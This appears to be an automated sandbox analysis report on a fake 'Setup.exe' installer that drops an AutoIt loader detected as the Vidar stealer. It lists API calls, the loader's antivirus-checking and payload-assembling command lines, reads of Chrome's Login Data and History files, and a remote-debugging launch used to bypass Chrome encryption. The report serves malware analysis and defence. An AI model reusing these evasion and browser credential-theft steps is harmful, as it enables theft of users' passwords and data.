Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7489.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7A65.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9F40.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9FAE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI73BC.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7A95.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi732E.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7580.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIA03D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI77E4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7746.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI744A.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7B91.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7B61.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9FFD.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\Setup.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-69008
Source: C:\Windows\Installer\MSIA1F4.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\Installer\MSIA1F4.tmp	API coverage: 5.2 %
Source: C:\Users\Public\Desktop\Setup.exe	API coverage: 4.3 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Setup.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File Volume queried: C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File Volume queried: C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0086E090 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	0_2_0086E090
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00844D70 FindFirstFileW,GetLastError,FindClose,	0_2_00844D70
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0086D390 FindFirstFileW,FindClose,DeleteFileW,GetLastError,	0_2_0086D390
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0086A320 FindFirstFileW,FindClose,	0_2_0086A320
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0088E410 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_0088E410
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00844440 FindFirstFileW,FindFirstFileW,FindClose,FindClose,	0_2_00844440
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_008269A0 FindFirstFileW,FindNextFileW,FindClose,	0_2_008269A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0087AA50 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_0087AA50
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00852D10 FindFirstFileW,FindClose,FindClose,	0_2_00852D10
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00704DD0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,	0_2_00704DD0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0087AED0 FindFirstFileW,FindClose,	0_2_0087AED0
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005C1860 FindFirstFileExW,	7_2_005C1860
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00007FF79EC5C7C0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00007FF79EC5BC70
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC5B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00007FF79EC5B7C0
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC671F4 FindFirstFileW,FindClose,	8_2_00007FF79EC671F4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_00007FF79EC672A8
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC22F50 FindFirstFileExW,	8_2_00007FF79EC22F50
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC6A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00007FF79EC6A874
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC6A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	8_2_00007FF79EC6A350
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC6A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	8_2_00007FF79EC6A4F8
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC66428 FindFirstFileW,FindNextFileW,FindClose,	8_2_00007FF79EC66428
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_00406301 FindFirstFileW,FindClose,	10_2_00406301
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	10_2_00406CC7

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_007244D0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,

0_2_007244D0

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0090DDB2 VirtualQuery,GetSystemInfo,

0_2_0090DDB2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\402438\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\402438	Jump to behavior

Source: msedge.exe, 0000001B.00000002.3291542727.00001ECC00050000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: Setup.exe, 00000008.00000003.2200528192.00000137983B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000008.00000002.2201516562.00000137983B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000008.00000002.2201230145.0000013798372000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000008.00000003.2200528192.0000013798372000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msedge.exe, 0000001B.00000002.3289291038.00000230A6446000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC70A00 BlockInput,

8_2_00007FF79EC70A00

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00916863 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00916863

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0083E460 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,

0_2_0083E460

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_008481D0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_008481D0

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00910FFD mov esi, dword ptr fs:[00000030h]

0_2_00910FFD

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00911069 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

0_2_00911069

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSIA1F4.tmp "C:\Windows\Installer\MSIA1F4.tmp" /DontWait "C:\Users\Public\Desktop\Setup.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00724480 __set_se_translator,SetUnhandledExceptionFilter,	0_2_00724480
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00916863 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00916863
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00730F90 __set_se_translator,SetUnhandledExceptionFilter,	0_2_00730F90
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00911AEE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00911AEE
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005AA1F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_005AA1F1
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005AE23B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_005AE23B
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005AA385 SetUnhandledExceptionFilter,	7_2_005AA385
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: 7_2_005A985D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_005A985D
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC059C8 SetUnhandledExceptionFilter,	8_2_00007FF79EC059C8
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC057E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF79EC057E4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC28FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF79EC28FE4
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC1AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF79EC1AF58

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC4CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_00007FF79EC4CE68

Source: C:\Windows\Installer\MSIA1F4.tmp

Code function: 7_2_00587800 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,SetWindowPos,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW,

7_2_00587800

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC59420 SendInput,keybd_event,

8_2_00007FF79EC59420

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC5D1A4 mouse_event,

8_2_00007FF79EC5D1A4

Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 402438	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com Suicide.com N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\lemcorporation\setup 0.5.1.2\install\setup.msi" ai_setupexepath=c:\users\user\desktop\setup.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1733431593 "
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\lemcorporation\setup 0.5.1.2\install\setup.msi" ai_setupexepath=c:\users\user\desktop\setup.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1733431593 "			Jump to behavior

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC4C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

8_2_00007FF79EC4C858

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0083F660 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,

0_2_0083F660

Source: Setup.exe, 00000008.00000000.2152192380.00007FF79ECB8000.00000002.00000001.01000000.00000009.sdmp, Suicide.com, 00000014.00000000.2253278807.0000000000696000.00000002.00000001.01000000.0000000C.sdmp, Suicide.com.11.dr, Setup.exe.2.dr, Curtis.10.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Setup.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\Public\Desktop\Setup.exe

Code function: 8_2_00007FF79EC1FD20 cpuid

8_2_00007FF79EC1FD20

Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,	0_2_0092C2BF
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,	0_2_008726D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00934654
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,	0_2_00934870
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_009349F9
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_00934913
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_0093495E
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00934A90
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,	0_2_00934CF0
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00934E15
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00934FF7
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoW,	0_2_00934F1B
Source: C:\Users\user\Desktop\Setup.exe	Code function: EnumSystemLocalesW,	0_2_0092BD42
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_005C50B7
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetLocaleInfoW,	7_2_005BF310
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetLocaleInfoEx,FormatMessageA,	7_2_005926C1
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	7_2_005C4714
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: EnumSystemLocalesW,	7_2_005C49D3
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: EnumSystemLocalesW,	7_2_005C4A1E
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: EnumSystemLocalesW,	7_2_005C4AB9
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_005C4B50
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: EnumSystemLocalesW,	7_2_005BEDE2
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetLocaleInfoW,	7_2_005C4DB0
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_005C4ED5
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetLocaleInfoW,	7_2_005C4FDB
Source: C:\Windows\Installer\MSIA1F4.tmp	Code function: GetLocaleInfoEx,	7_2_005A8F9C

Source: C:\Users\user\Desktop\Setup.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00889930 CreateNamedPipeW,CreateFileW,

0_2_00889930

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0083E370 GetLocalTime,

0_2_0083E370

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_008882B0 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,

0_2_008882B0

Source: C:\Windows\Installer\MSIA1F4.tmp

Code function: 7_2_005BF7A4 GetTimeZoneInformation,

7_2_005BF7A4

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_006E7A00 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,

0_2_006E7A00

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Setup.exe	Binary or memory string: WIN_81
Source: Setup.exe	Binary or memory string: WIN_XP
Source: Setup.exe	Binary or memory string: WIN_XPe
Source: Setup.exe	Binary or memory string: WIN_VISTA
Source: Setup.exe.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Setup.exe	Binary or memory string: WIN_7
Source: Setup.exe	Binary or memory string: WIN_8
Source: Curtis.10.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC74074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		8_2_00007FF79EC74074
Source: C:\Users\Public\Desktop\Setup.exe	Code function: 8_2_00007FF79EC73940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		8_2_00007FF79EC73940

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	2 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	2 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	11 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
